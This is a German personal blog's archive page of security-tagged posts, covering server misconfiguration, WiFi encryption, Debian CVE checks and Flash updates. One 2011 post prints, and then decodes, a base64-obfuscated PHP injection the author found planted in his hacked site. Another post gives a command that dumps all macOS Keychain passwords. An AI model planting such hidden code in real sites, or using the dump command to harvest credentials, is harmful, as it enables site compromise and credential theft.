Posts Tagged ‘Sicherheit’

Mittwoch, 2. März 2016

Der Tagi-Webmaster sollte seinen produktiven Server besser konfigurieren

display_errors = On gehört nun einfach wirklich nicht auf den Produktionsserver. Anfänger.

Tagesanzeiger Exception
image-6568

Tags: , , , ,
Labels: Web

Keine Kommentare | neuen Kommentar verfassen

Mittwoch, 2. März 2016

Little Snitch-Firewall meldet verdächtigen Domain-Namen wegen nicht mehr aktueller Reverse IP-Auflösung

Als ich gestern meine lokale Oracle Java-Installation aktualisieren wollte, stutzte ich einige Sekunden, als mir die Software-Firewall Little Snitch folgende Warnung anzeigte:

m2.feiwi.tv
image-6555

Erst als ich mir die Details zum Internet-Host anzeigen liess, beruhigte sich mein Puls wieder: Die IP-Adresse 77.109.137.184 gehört zum Akamai CDN, scheint aber früher einmal für m2.feiwei.tv registriert gewesen zu sein. Ich nahm das Risiko auf mich und erlaubte die temporäre Freigabe von Verkehr zu diesem Internet-Host.

Tags: , , , , ,
Labels: IT

Keine Kommentare | neuen Kommentar verfassen

Sonntag, 17. Januar 2016

WiFi-Sicherheit erhöhen: Bye bye TKIP

Auf dem Flug von Tel Aviv nach Zürich hatte ich Zeit, längst überfällige YouTube-Videos zu schauen. Unter anderem auch eine Präsentation von der BruCON 0x07 mit dem Titel „Advances WiFi Attacks using Commodity Hardware“:

Noch während dem Flug notierte ich mir gemäss den Ausführungen im Video ab 42 Minuten 52 Sekunden, zu Hause auf meinem Asus RT-AC66U mit DD-WRT das unsichere Verschlüsselungsprotokoll TKIP zu deaktivieren. Aus (unnötigen) Kompatibilitätsgründen könnte dieses Protokoll nämlich auch 2016 noch Standardmässig auf WLAN-Access Points aktiviert sein.

Erleichtert durfte ich zu Hause dann aber feststellen, dass ich offenbar in weiser Voraussicht längst nur noch AES-CCMP aktiviert hatte:

DD-WRT Wireless Security
image-6464

Tags: , , , , , , , , , , ,
Labels: Uncategorized

Keine Kommentare | neuen Kommentar verfassen

Donnerstag, 5. März 2015

Ist ein bestimmtes Debian-Paket von einer Sicherheitslücke betroffen?

In den letzten Tagen kam es knüppelhart: Zuerst meldeten die PHP-Entwickler eine Sicherheitslücke in der unserialize()-Funktion (CVE-2015-0273), tags darauf mussten die Leute hinter Samba ein schwerwiegendes Problem in ihrer Software anerkennen (CVE-2015-0240).

Wie gehe ich sicher, dass auf meinem Debian-Server zu Hause Pakete installiert sind, in welchen diese Sicherheitsprobleme bereits behoben wurden?Nach einer kurzen Google-Suche fand ich die Antwort:

Im Debian Security Tracker kann ich nachschauen, welche Pakete von welchen „Common Vulnerabilities and Exposure“ betroffen sind. In den beiden erwähnten Fällen lauten die URLs auf die Detailseite folgendermassen:

Die dort angegebenen Versionsnummern kann ich anschliessend auf meinem Server mittels folgendem Befehl überprüfen:

$ dpkg --list | grep php
...
ii  php5                                 5.6.5+dfsg-2                         all          server-side, HTML-embedded scripting language (metapackage)
...

5.6.5+dfsg-2 ist immer noch anfällig auf das Problem, da die Sicherheitslücke offenbar erst mit 5.6.6+dfsg-2 behoben ist. Nebenbei: Mehr zum Kürzel „dfsg“.

Deshalb führe ich folgenden Befehl aus:

# apt-get upgrade php5
...
Calculating upgrade... php5 is already the newest version.
...

Offenbar muss ich mich also noch ein wenig in Geduld üben.

Bei Samba schaut es folgendermassen aus:

$ dpkg --list | grep samba
...
ii  samba                                2:4.1.17+dfsg-1                      i386         SMB/CIFS file, print, and login server for Unix
...

4.1.17+dfsg-1 wird auf der Web-Site als „fixed“ geführt. Glück gehabt!

Tags: , , , ,
Labels: IT

Keine Kommentare | neuen Kommentar verfassen

Sonntag, 14. Dezember 2014

Welche Adobe Flash-Version verwende ich?

In den letzten Wochen haben sich die Sicherheits-Updates für Adobes Flash-Frickelware wieder gehäuft. Ob ich das neuste Plugin auf einem Rechner installieren muss, sagt mir folgende Web-Site:

What is my Flash Player version? Is it up-to-date?

Die Web-Site Flash Tester liefert zusätzlich eine Chronologie aller Updates und verlinkt zudem auf eine offizielle, von Adobe gehostete Seite, welche die Version des aktuell installierten Flash-Plugins anzeigt, an Hand derer der Benutzer in einer Tabelle selber nachschauen muss, ob er schon Up-to-date ist:

Adobe — Flash Player Version Information

Meine Besucher entscheiden bitte selber, welche der beiden Web-Seiten nun benutzerfreundlicher ist … ich persönlich habe meine Meinung gebildet, und sie bekräftigt meinen Eindruck des Bloatware-Herstellers Adobe.

Tags: , , , , ,
Labels: Web

Keine Kommentare | neuen Kommentar verfassen

Sonntag, 16. September 2012

Apple Keychain-Passwörter auf der Kommandozeile ausgeben

Mit folgendem Kommandozeilen-Befehl gibt man alle in der Apple Keychain gespeicherten Passwörter für den aktuellen Benutzer aus:

security dump-keychain -d ~/Library/Keychains/login.keychain

ACHTUNG: Wer (vorbildlicherweise) die Keychain für fremde Zugriffe gesperrt hat, muss für jeden Eintrag ein Dialogfeld abnicken, um den Zugriff für die Anwendung security zu gewähren.

Via: Print out all your saved passwords – OSX

Tags: , , ,
Labels: Apple

Keine Kommentare | neuen Kommentar verfassen

Mittwoch, 4. Januar 2012

Autos auch am Tag mit Licht

Mousseman ist und bleibt der Hardliner in der schweizerischen Blogger-Szene:

Gerade das Lichtobligatorium für PKW am hellichten Tag halte ich für einen patenten Schwachsinn. Wer ein Auto am Tag nicht sieht, ist blind.

Quelle: Neues Parlament, neues ‚Via Sicura‘, gleicher Stuss

Tags: , ,
Labels: Schweiz

Keine Kommentare | neuen Kommentar verfassen

Sonntag, 13. November 2011

Genotec-Web-Server gehackt

Bei einer Routineüberprüfung meiner bei der Genotec AG gehosteten Web-Site eMeidi.com entdeckte ich soeben in der index.php in meinem Web-Root zuoberst folgenden kryptischen Eintrag:

<?php
error_reporting(0);
$gc0=base64_decode('ZG93bmxvYWRzL3dpbmRvd3MtcHJpY2VzLw==');
$fq1=$_SERVER[base64_decode('UVVFUllfU1RSSU5H')];
$ti2=strpos($fq1,base64_decode('cD0='));

if($ti2===0){include($gc0.base64_decode('Pw==').$fq1);
exit;
}?>
<?php include(base64_decode('c2l0ZWluZGV4LnBocA=='));?>
...

Nach einer kurzen Analse der Base64-enkodierten Strings ging mir ein Lichtlein auf:

<?php
error_reporting(0);
$gc0='downloads/windows-prices/';
$fq1=$_SERVER['QUERY_STRING'];
$ti2=strpos($fq1,'p=');

if($ti2===0){include($gc0.'?'.$fq1);
exit;
}?>
<?php include('siteindex.php');?>
...

Dies erklärt mir endlich, wieso bei der Google-Suche nach eMeidi seit Monaten folgende komische Beschreibung zu meiner Web-Site angezeigt wird:

image-4825

Im Web-Root fanden sich folgende drei vom Hacker hinterlegte Dateien (ls -l unter Mac OS X, das Datum und die Dateigrössen stimmen mit dem Web-Server überein):

-rw-r--r--@ 1 mario  staff  23233  5 Jul  2010 login.php
-rw-r--r--@ 1 mario  staff  14028  5 Jul  2010 siteindex.php
-rw-r--r--@ 1 mario  staff  17986  5 Jul  2010 sitestatus.php

Zweck

(Vermutung) Das einschleusen von Seiteninhalten, um das Google-Ranking meiner Web-Site auszunutzen und unbedarfte Anwender auf Web-Sites zu locken, auf welchen Waren (wohl vornehmlich Raubkopien) angeboten werden — oder Kreditkartendaten abgegriffen werden.

/downloads/windows-prices/

Im besagten Verzeichnis /downloads/windows-prices/finden sich in ca. 10’000 Dateien über 190MB an Daten. Leider kann ich diese nicht löschen, weil sie dem www-Benutzer und nicht dem www4607 gehören. Ich gehe deshalb davon aus, dass nicht ein fehlerhaftes Script von mir für die Sicherheitslücke verantwortlich ist, sondern eine Sicherheitslücke in Apache:

Verzeichnis-Listing

Forensik

Wer mehr über die Technik hinter dem Hack erfahren will, lädt sich das mehr als 70MB umfassende Archiv aller suspekten Dateien herunter, welche ich vor der definitiven Löschung von meinem Server gesichert habe:

Archiv aller vom Hacker auf meinem Server abgelegten Dateien

Tags: , ,
Labels: Allgemein

5 Kommentare | neuen Kommentar verfassen

Montag, 6. Juni 2011

Rätselraten über die Ursache hinter den EHEC-Infektionen

Ich liebe Politiker (nicht zuletzt, weil ich selber auch einer bin): Da gibt es eine Infektion, von welcher man nicht genau weiss, wodurch sie übertragen wird. Deshalb tritt man vor die Medien, feuert aus dem Bauch heraus gegen spanische Gurken und verursacht so bei den Landwirtskollegen auf der iberischen Halbinsel einen massiven Verlust:

The Spanish government did not comment Sunday on the latest news in the German investigation. But mounting evidence that the problem should never have been linked to produce from Spanish farms is likely to raise pressure on Germany and the European Union to compensate Spanish farmers for estimated weekly losses of $286 million in revenue because of canceled shipments, as well as massive job cuts among seasonal growers in Andalusia.

Quelle: Deadly E. Coli Outbreak Linked to Sprouts From a German Farm – NYTimes.com

Mittlerweile hat man sich von dieser doch etwas abstrusen Theorie abgekehrt, hat voreilig Kartoffelkeller als EHEC-Herde gebrandmarkt, um schlussendlich zu merken, dass es doch vielleicht einfach Sprossen sind, die die Krankheit übertragen.

Vielleicht würde es den deutschen Politikern gut tun, einfach mal die Klappe zu halten und schlüssige Resultate der Wissenschaftler abzuwarten. Und die Journalisten sollten sich ebenfalls etwas gedulden und nicht wie ein Fasnachts-Gugge morgens um 3 Uhr in jeden noch geöffneten Keller in der Berner Altstadt einfallen.

Die Volksvertreter im hohen Norden sollten sich ein Beispiel an Apple nehmen. Kürzlich hat Apple an Hand von zwei Beispielen gezeigt, wie man mit Krisen umgeht:

  • Lodsys betätigt sich ab dem 13. Mai 2011 als Patent-Troll. Die Stellungnahme von Apple erfolgt 10 Tage später, am 23. Mai 2011. Sie lässt keine Fragen offen.
  • Die Malware MACDefender wird ab dem 2. Mai 2011 zunehmend von unbedarften Apple-Benutzern auf Systemen installiert. Apple reagiert 29 Tage später, am 31. Mai 2011, mit einem Security Update, welches die aktuelle Version der Software und mögliche zukünftige Varianten des Schädlings blockieren.

Das Rezept ist bei dieser professionell agierenden Bude immer dasselbe: Abwarten, analysieren und erst dann vor das Publikum treten, wenn mit einer bombensicher funktionierenden (!) Lösung des Problems aufgewartet werden kann. Gruber hat dieses vorbildliche Verhalten wie immer in einem Artikel zusammengefasst.

Und wer mir jetzt widerspricht, dass ich hier Apple mit Birnen vergleiche: Die deutschen Politiker hätten ihren Mitbürgern vielleicht raten sollen, in den nächsten zwei Wochen einfach mal nichts zu essen … Man weiss ja nie!

Tags: , , , , , , ,
Labels: Apple

Keine Kommentare | neuen Kommentar verfassen

Samstag, 4. Juni 2011

Manuell ein TimeMachine sparsebundle-Image anlegen

Für meinen betagten PowerMac G5 sah der Befehl folgendermassen aus:

$ hdiutil create -size 500g -fs HFS+J -volname "BETA" beta_000a95XXXXXX.sparsebundle

… wobei ich aus Datenschutzgründen die MAC-Adresse mittels „X“-Zeichen unkenntlich gemacht habe.

Das damit erstellte Image kann man anschliessend auf einer Samba-Freigabe auf einem Server ablegen und als TimeMachine-Ziel benutzen. Bei mir klappte diese Art von Backup einige Monate, bis das Image irgendwie korrumpiert wurde. Seither fahre ich kein TimeMachine-Backup mehr.

Vielleicht bringt ja die WWDC-Keynote 2011 eine interessante neue Möglichkeit (iCloud?), um Backups zu fahren.

Tags: , ,
Labels: Apple

Keine Kommentare | neuen Kommentar verfassen